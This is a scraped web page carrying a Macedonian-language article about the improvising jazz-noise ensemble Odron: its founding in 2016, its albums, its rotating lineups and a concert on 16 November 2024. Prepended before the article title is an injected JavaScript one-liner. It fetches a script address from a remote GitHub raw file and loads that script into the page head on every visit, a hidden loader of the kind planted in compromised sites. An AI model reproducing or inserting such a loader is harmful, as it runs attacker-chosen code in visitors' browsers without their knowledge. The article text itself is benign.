;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Македонската алтернативна сцена не е мртва - Антропол
АктуелноЛокалноНастани

Македонската алтернативна сцена не е мртва

Одрон е музичка платформа што функционира првенствено како импровизирачки ансамбл чија постава е во постојана ротација. Формирана е во 2016 како трио составено од Филип Букршлиев, Дени Омерагиќ и Нинослав Спировски, во тoј момент членови на Fighting Windmills, со идеја да се презентира предизвикувачка импровизирачка музика во различни формати. Во 2018 го издаваат дебитантскиот албум ОДРОН, како трето издание за тогаш новата издавачка под-етикета PMGJazz. Наредната 2019 година, Омерагиќ и Спировски, заедно со Кристијан Новковски (тројцата членови на групата Светлост) го прошируваат концептот во 11-член ансамбл наречен Odron Ritual Orchestra, со кој снимаат 2 успешни албуми. Од самиот почеток на форматот низ различните формации под името Одрон свиреле 20тина музичари. Покрај триото и оркестарот, во последните години редовно се одржуваат сесии под името Odron Ritual Quartet/Quintet/Sextet, каде различни музичари настапуваат на јавни импровизирани концертни сесии курирани и предводени од Омерагиќ и Спировски. Нивниот стил е спој на повеќе жанрови (џез, дум и ноиз), кој може слободно да се нарече џезкор, изобилувајќи со енергичност и креативност. На последниот настап во местото ЅЕ одржан на 16. 11. 2024 год. настапија: Нинослав Спировски (тенор саксофон) Васко Бојаџиски (тенор саксофон) Кристијан Савиќ (гитара) Филип Букршлиев (гитара) Дарио Циевски (тапани) Дени Омерагиќ (бас / електроника).